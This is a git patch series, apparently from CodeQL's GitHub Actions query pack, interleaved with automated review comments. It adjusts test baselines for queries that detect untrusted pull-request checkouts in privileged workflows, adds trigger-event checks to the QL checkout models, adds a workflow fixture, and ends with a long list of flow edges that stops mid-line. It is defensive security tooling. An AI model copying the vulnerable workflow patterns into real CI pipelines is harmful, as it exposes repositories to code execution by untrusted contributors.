diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected
index 13e16280c33d..1d6122b37479 100644
--- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected
+++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected
@@ -1,7 +1,3 @@
-| .github/workflows/issue_comment_3rd_party_action.yml:16:9:22:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. |
-| .github/workflows/issue_comment_3rd_party_action.yml:30:9:36:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. |
-| .github/workflows/issue_comment_3rd_party_action.yml:45:9:49:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. |
-| .github/workflows/issue_comment_3rd_party_action.yml:49:9:52:25 | Uses Step | Potential execution of untrusted code on a privileged workflow. |
 | .github/workflows/issue_comment_direct.yml:12:9:16:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. |
 | .github/workflows/issue_comment_direct.yml:20:9:24:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. |
 | .github/workflows/issue_comment_direct.yml:28:9:32:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. |
diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected
index c81666f72dc2..a476bdc22d8a 100644
--- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected
+++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected
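Review bot: All four High results for `issue_comment_3rd_party_action.yml` are removed even though `issue_comment` is in the new `checkoutTriggers()` list, so the trigger gate alone does not explain the drop, and the `issue_comment_direct.yml` results next to them survive. The commit's diffstat shows `UntrustedCheckoutCritical.expected | 3 +` (the three new edges above), so these four did not move to the Critical query; they are simply no longer reported. The most likely cause, to be confirmed, is the new `source.asExpr().getEnclosingJob()` requirement in `isSource` not holding for the third-party-action `steps.<id>.outputs.head_ref` expressions that fixture uses; either way the baseline should not be accepted until the commit explains where these results went.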
@@ -1,13 +1,6 @@
-| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:14:9:19:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
 | .github/workflows/artifactpoisoning81.yml:11:9:14:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
-| .github/workflows/artifactpoisoning82.yml:11:9:14:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
-| .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
-| .github/workflows/dependabot1.yml:39:9:43:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
-| .github/workflows/dependabot2.yml:33:9:38:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
-| .github/workflows/mend.yml:22:9:29:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
 | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
 | .github/workflows/poc.yml:30:9:36:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
-| .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
 | .github/workflows/test3.yml:28:9:33:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
 | .github/workflows/test4.yml:18:7:25:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
 | .github/workflows/test8.yml:20:9:26:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
From 0cacb6feaffba0b5317ecb3829d657b3ba89371b Mon Sep 17 00:00:00 2001
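Review bot: Seven Medium results disappear with no fixture change in this commit, and several of the names read as intended positives (`priv_pull_request_checkout.yml`, `dependabot1.yml`, `dependabot2.yml`, `mend.yml`, and `formal.yml` under `reusable_workflows`); presumably they drop because their `on:` events are outside the new `checkoutTriggers()` list, not because the checkouts became safe. Reusable workflows and Dependabot workflows are exactly the cases where the effective trigger is inherited from a caller or is `pull_request_target`, so please confirm each dropped result against its fixture's `on:` block before accepting this baseline. A line in the commit message stating why each removed result is a false positive would make the baseline change reviewable.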
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 22 Oct 2024 22:42:51 +0200 Subject: [PATCH 609/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 867f1bfdb862..404c86d212cc 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.71 +version: 0.1.72 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index df650d0e242e..1296bbd667b1 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.71 +version: 0.1.72 groups: [actions, queries] suites: codeql-suites extractor: javascript From 0738a66380d8f781114441348d0713c090c30d5a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 23 Oct 2024 09:37:01 +0200 Subject: [PATCH 610/707] Add trigger event checks for all checkout models --- .../security/UntrustedCheckoutQuery.qll | 4 + .../CWE-829/.github/workflows/test24.yml | 20 + .../CWE-829/UntrustedCheckoutCritical.actual | 342 ++++++++++++++++++ 3 files changed, 366 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test24.yml create mode 100644 ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.actual diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index 621f4b80e1f0..ea3f4c3c269f 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll 
@@ -283,6 +283,7 @@ class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep { class GitMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { GitMutableRefCheckout() { exists(string cmd | this.getScript().getACommand() = cmd | + this.getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers() and cmd.regexpMatch("git\\s+(fetch|pull).*") and ( (containsHeadRef(cmd) or containsPullRequestNumber(cmd)) @@ -306,6 +307,7 @@ class GitMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { class GitSHACheckout extends SHACheckoutStep instanceof Run { GitSHACheckout() { exists(string cmd | this.getScript().getACommand() = cmd | + this.getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers() and cmd.regexpMatch("git\\s+(fetch|pull).*") and ( containsHeadSHA(cmd) @@ -326,6 +328,7 @@ class GitSHACheckout extends SHACheckoutStep instanceof Run { class GhMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { GhMutableRefCheckout() { exists(string cmd | this.getScript().getACommand() = cmd | + this.getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers() and cmd.regexpMatch(".*(gh|hub)\\s+pr\\s+checkout.*") and ( (containsHeadRef(cmd) or containsPullRequestNumber(cmd)) @@ -348,6 +351,7 @@ class GhMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { class GhSHACheckout extends SHACheckoutStep instanceof Run { GhSHACheckout() { exists(string cmd | this.getScript().getACommand() = cmd | + this.getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers() and cmd.regexpMatch("gh\\s+pr\\s+checkout.*") and ( containsHeadSHA(cmd) diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test24.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test24.yml new file mode 100644 index 000000000000..8502d081a734 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test24.yml 
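Review bot: Each of the four hunks adds `this.getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers()` inside `exists(string cmd | ... )`, where it does not depend on `cmd`; hoist it in front of the `exists` so the command regexes only run for jobs that can be privileged, and preferably state it once in the shared `MutableRefCheckoutStep`/`SHACheckoutStep` hierarchy (or a small `PrivilegedTriggerStep` class) so that these four `Run`-based models and the two `actions/checkout` models in FlowSources cannot disagree. As written, a `Run` step whose enclosing job has no resolvable trigger event silently stops being a checkout step at all; if that is intended for composite-action steps, a comment on the shared predicate saying so would save the next reader a test run. All four characteristic predicates continue outside their hunks.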
@@ -0,0 +1,20 @@ +on: [ workflow_dispatch, pull_request ] +jobs: + test: + runs-on: ubuntu-20.04 + if: github.event_name == 'pull_request' + steps: + - name: Check out repository code + uses: actions/checkout@v2 + + - name: Fetch base and head on PR + if: ${{ github.event.pull_request.base.sha }} + run: | + git fetch origin master ${{ github.event.pull_request.base.sha }} + git fetch origin master ${{ github.event.pull_request.head.sha }} + + - name: Check that Pull Request includes updating the Version + run: | + git show ${{ github.event.pull_request.base.sha }}:src/mplfinance/_version.py > scripts/tv0.py + git show ${{ github.sha }}:src/mplfinance/_version.py > scripts/tv1.py + python scripts/version_update_check.py tv0 tv1 diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.actual b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.actual new file mode 100644 index 000000000000..1ed39f73a485 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.actual 
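Review bot: test24.yml is a negative fixture (`on: [ workflow_dispatch, pull_request ]` with the job gated by `if: github.event_name == 'pull_request'`, under which the token is read-only for fork PRs), but nothing in the file says so, and the commit's diffstat pairs it with a new `UntrustedCheckoutCritical.actual` instead of an `.expected` update; `.actual` is the test runner's output for a mismatching baseline and should be folded into `.expected` (or deleted), not committed. Add a leading comment to the fixture, e.g. `# Negative case: pull_request only (no write token for fork PRs), fetching head.sha must not be reported`, so the intent survives the next change to `checkoutTriggers()`.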
@@ -0,0 +1,342 @@ +edges +| .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | +| .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/actions/download-artifact-2/action.yaml:25:7:29:4 | Run Step | +| .github/actions/download-artifact-2/action.yaml:25:7:29:4 | Run Step | .github/actions/download-artifact-2/action.yaml:29:7:32:18 | Run Step | +| .github/actions/download-artifact-2/action.yaml:29:7:32:18 | Run Step | .github/workflows/artifactpoisoning92.yml:19:9:25:6 | Run Step: metadata | +| .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | .github/actions/download-artifact/action.yaml:25:7:29:4 | Run Step | +| .github/actions/download-artifact/action.yaml:25:7:29:4 | Run Step | .github/actions/download-artifact/action.yaml:29:7:32:18 | Run Step | +| .github/actions/download-artifact/action.yaml:29:7:32:18 | Run Step | .github/workflows/artifactpoisoning91.yml:19:9:25:6 | Run Step: metadata | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:14:9:19:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:19:9:25:6 | Run Step | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:19:9:25:6 | Run Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:25:9:70:20 | Run Step | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | +| .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:14:7:15:4 | Uses Step | +| .github/workflows/actor_trusted_checkout.yml:14:7:15:4 | Uses Step | 
.github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | +| .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | +| .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | +| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:32:9:36:6 | Run Step | +| .github/workflows/artifactpoisoning11.yml:32:9:36:6 | Run Step | .github/workflows/artifactpoisoning11.yml:36:9:38:78 | Run Step | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:32:9:36:6 | Run Step | +| .github/workflows/artifactpoisoning12.yml:32:9:36:6 | Run Step | .github/workflows/artifactpoisoning12.yml:36:9:38:26 | Run Step | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:18:9:20:21 | Run Step | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:17:9:18:20 | Run Step | +| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:15:9:18:6 | Run Step | +| .github/workflows/artifactpoisoning31.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | +| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | +| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:16:9:20:6 | Uses Step | +| .github/workflows/artifactpoisoning34.yml:16:9:20:6 | Uses Step | .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | +| 
.github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | +| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:21:9:22:19 | Run Step | +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:15:9:18:6 | Run Step | +| .github/workflows/artifactpoisoning51.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:15:9:18:6 | Run Step | +| .github/workflows/artifactpoisoning52.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning52.yml:18:9:22:40 | Run Step | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:15:9:18:6 | Run Step | +| .github/workflows/artifactpoisoning53.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:9:23:29 | Run Step | +| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:16:9:18:40 | Run Step | +| .github/workflows/artifactpoisoning81.yml:11:9:14:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:14:9:16:6 | Run Step | +| .github/workflows/artifactpoisoning81.yml:14:9:16:6 | Run Step | .github/workflows/artifactpoisoning81.yml:16:9:22:2 | Uses Step | +| .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:9:31:28 | Run Step | +| .github/workflows/artifactpoisoning82.yml:11:9:14:6 | Uses Step | .github/workflows/artifactpoisoning82.yml:14:9:16:6 | Run Step | +| .github/workflows/artifactpoisoning82.yml:14:9:16:6 | Run Step | .github/workflows/artifactpoisoning82.yml:16:9:22:2 | Uses Step | +| .github/workflows/artifactpoisoning82.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning82.yml:31:9:31:28 | Run 
Step | +| .github/workflows/artifactpoisoning91.yml:17:9:18:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:18:9:19:6 | Uses Step | +| .github/workflows/artifactpoisoning91.yml:18:9:19:6 | Uses Step | .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | +| .github/workflows/artifactpoisoning91.yml:18:9:19:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:19:9:25:6 | Run Step: metadata | +| .github/workflows/artifactpoisoning91.yml:19:9:25:6 | Run Step: metadata | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | +| .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:28:9:29:6 | Uses Step | +| .github/workflows/artifactpoisoning91.yml:28:9:29:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:29:9:29:27 | Run Step | +| .github/workflows/artifactpoisoning92.yml:17:9:18:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:18:9:19:6 | Uses Step | +| .github/workflows/artifactpoisoning92.yml:18:9:19:6 | Uses Step | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | +| .github/workflows/artifactpoisoning92.yml:18:9:19:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:19:9:25:6 | Run Step: metadata | +| .github/workflows/artifactpoisoning92.yml:19:9:25:6 | Run Step: metadata | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | +| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | +| .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:9:29:27 | Run Step | +| .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:16:9:19:59 | Run Step: pr_number | +| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | +| .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | 
.github/workflows/auto_ci.yml:32:9:37:6 | Run Step | +| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:37:9:40:6 | Run Step | +| .github/workflows/auto_ci.yml:37:9:40:6 | Run Step | .github/workflows/auto_ci.yml:40:9:44:6 | Run Step | +| .github/workflows/auto_ci.yml:40:9:44:6 | Run Step | .github/workflows/auto_ci.yml:44:9:48:6 | Run Step | +| .github/workflows/auto_ci.yml:44:9:48:6 | Run Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | +| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | +| .github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | +| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | +| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | +| .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | .github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files | +| .github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | +| .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | .github/workflows/auto_ci.yml:119:9:125:6 | Run Step | +| .github/workflows/auto_ci.yml:119:9:125:6 | Run Step | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | +| .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | .github/workflows/auto_ci.yml:133:9:135:20 | Run Step | +| .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | .github/workflows/dependabot1.yml:19:9:23:6 | Run Step: nvm | +| .github/workflows/dependabot1.yml:19:9:23:6 | Run Step: nvm | .github/workflows/dependabot1.yml:23:9:28:6 | Uses Step | +| .github/workflows/dependabot1.yml:23:9:28:6 | Uses Step | .github/workflows/dependabot1.yml:28:9:31:6 | Run Step | +| .github/workflows/dependabot1.yml:28:9:31:6 | Run Step | 
.github/workflows/dependabot1.yml:31:9:34:6 | Run Step | +| .github/workflows/dependabot1.yml:31:9:34:6 | Run Step | .github/workflows/dependabot1.yml:34:9:36:2 | Run Step | +| .github/workflows/dependabot1.yml:39:9:43:6 | Uses Step | .github/workflows/dependabot1.yml:43:9:45:29 | Uses Step | +| .github/workflows/dependabot2.yml:33:9:38:6 | Uses Step | .github/workflows/dependabot2.yml:38:9:42:6 | Run Step: nvm | +| .github/workflows/dependabot2.yml:38:9:42:6 | Run Step: nvm | .github/workflows/dependabot2.yml:42:9:47:6 | Uses Step | +| .github/workflows/dependabot2.yml:42:9:47:6 | Uses Step | .github/workflows/dependabot2.yml:47:9:52:6 | Run Step | +| .github/workflows/dependabot2.yml:47:9:52:6 | Run Step | .github/workflows/dependabot2.yml:52:9:58:6 | Run Step | +| .github/workflows/dependabot2.yml:52:9:58:6 | Run Step | .github/workflows/dependabot2.yml:58:9:61:6 | Run Step | +| .github/workflows/dependabot2.yml:58:9:61:6 | Run Step | .github/workflows/dependabot2.yml:61:9:68:19 | Run Step | +| .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:20:9:25:6 | Uses Step | +| .github/workflows/dependabot3.yml:20:9:25:6 | Uses Step | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | +| .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | .github/workflows/dependabot3.yml:48:9:52:57 | Run Step | +| .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:18:11:21:8 | Uses Step | +| .github/workflows/gitcheckout.yml:18:11:21:8 | Uses Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | +| .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | .github/workflows/issue_comment_3rd_party_action.yml:16:9:22:2 | Uses Step | +| .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | .github/workflows/issue_comment_3rd_party_action.yml:30:9:36:2 | Uses Step | +| 
.github/workflows/issue_comment_3rd_party_action.yml:39:9:45:6 | Uses Step: refs | .github/workflows/issue_comment_3rd_party_action.yml:45:9:49:6 | Uses Step | +| .github/workflows/issue_comment_3rd_party_action.yml:45:9:49:6 | Uses Step | .github/workflows/issue_comment_3rd_party_action.yml:49:9:52:25 | Uses Step | +| .github/workflows/issue_comment_heuristic.yml:11:9:24:6 | Uses Step: get-pr-info | .github/workflows/issue_comment_heuristic.yml:24:9:28:6 | Run Step: get-sha | +| .github/workflows/issue_comment_heuristic.yml:24:9:28:6 | Run Step: get-sha | .github/workflows/issue_comment_heuristic.yml:28:9:33:2 | Uses Step | +| .github/workflows/issue_comment_heuristic.yml:37:7:48:4 | Run Step: vars | .github/workflows/issue_comment_heuristic.yml:48:7:50:46 | Uses Step | +| .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | +| .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | .github/workflows/issue_comment_octokit.yml:26:9:30:6 | Uses Step | +| .github/workflows/issue_comment_octokit.yml:26:9:30:6 | Uses Step | .github/workflows/issue_comment_octokit.yml:30:9:35:2 | Uses Step | +| .github/workflows/issue_comment_octokit.yml:38:9:52:6 | Uses Step: get-pr-info | .github/workflows/issue_comment_octokit.yml:52:9:57:6 | Run Step: get-sha | +| .github/workflows/issue_comment_octokit.yml:52:9:57:6 | Run Step: get-sha | .github/workflows/issue_comment_octokit.yml:57:9:62:2 | Uses Step | +| .github/workflows/issue_comment_octokit.yml:66:9:79:6 | Uses Step: sha | .github/workflows/issue_comment_octokit.yml:79:9:83:2 | Uses Step | +| .github/workflows/issue_comment_octokit.yml:87:9:95:6 | Uses Step: sha | .github/workflows/issue_comment_octokit.yml:95:9:100:2 | Uses Step | +| .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | .github/workflows/issue_comment_octokit.yml:109:9:114:66 | Uses Step | +| 
.github/workflows/label_trusted_checkout.yml:11:7:15:4 | Uses Step | .github/workflows/label_trusted_checkout.yml:15:7:16:4 | Uses Step | +| .github/workflows/label_trusted_checkout.yml:15:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout.yml:16:7:20:4 | Run Step | +| .github/workflows/label_trusted_checkout.yml:16:7:20:4 | Run Step | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | +| .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | +| .github/workflows/level0.yml:33:9:36:6 | Uses Step | .github/workflows/level0.yml:36:9:39:6 | Uses Step | +| .github/workflows/level0.yml:36:9:39:6 | Uses Step | .github/workflows/level0.yml:39:9:52:2 | Run Step: check_profanities | +| .github/workflows/level0.yml:62:9:65:6 | Uses Step | .github/workflows/level0.yml:65:9:86:2 | Uses Step | +| .github/workflows/level0.yml:96:9:99:6 | Uses Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | +| .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:103:9:107:6 | Uses Step | +| .github/workflows/level0.yml:103:9:107:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | +| .github/workflows/level0.yml:122:9:125:6 | Uses Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | +| .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:129:9:133:6 | Uses Step | +| .github/workflows/level0.yml:129:9:133:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | +| .github/workflows/mend.yml:13:9:22:6 | Run Step: set_ref | .github/workflows/mend.yml:22:9:29:6 | Uses Step | +| .github/workflows/mend.yml:22:9:29:6 | Uses Step | .github/workflows/mend.yml:29:9:33:28 | Uses Step | +| .github/workflows/poc2.yml:28:9:37:6 | Uses Step: branch-deploy | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | +| .github/workflows/poc2.yml:37:9:42:6 | Uses Step | 
.github/workflows/poc2.yml:42:9:47:6 | Uses Step | +| .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:47:9:52:6 | Run Step | +| .github/workflows/poc2.yml:47:9:52:6 | Run Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:25:7:31:4 | Uses Step | +| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:31:7:33:4 | Uses Step | +| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | +| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | +| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | +| .github/workflows/poc3.yml:40:7:41:4 | Run Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | +| .github/workflows/poc3.yml:41:7:42:4 | Run Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | +| .github/workflows/poc3.yml:42:7:43:4 | Run Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | +| .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:36:9:38:6 | Uses Step | +| .github/workflows/poc.yml:36:9:38:6 | Uses Step | .github/workflows/poc.yml:38:9:43:6 | Uses Step | +| .github/workflows/poc.yml:38:9:43:6 | Uses Step | .github/workflows/poc.yml:43:9:47:2 | Uses Step | +| .github/workflows/pr-workflow.yml:57:9:60:6 | Uses Step | .github/workflows/pr-workflow.yml:60:9:70:6 | Uses Step | +| .github/workflows/pr-workflow.yml:60:9:70:6 | Uses Step | .github/workflows/pr-workflow.yml:70:9:78:6 | Uses Step | +| .github/workflows/pr-workflow.yml:70:9:78:6 | Uses Step | .github/workflows/pr-workflow.yml:78:9:81:2 | Run Step: ok | +| .github/workflows/pr-workflow.yml:103:9:109:6 | Uses Step | .github/workflows/pr-workflow.yml:109:9:124:6 | Uses Step | +| .github/workflows/pr-workflow.yml:109:9:124:6 | Uses Step | .github/workflows/pr-workflow.yml:124:9:126:2 | Run 
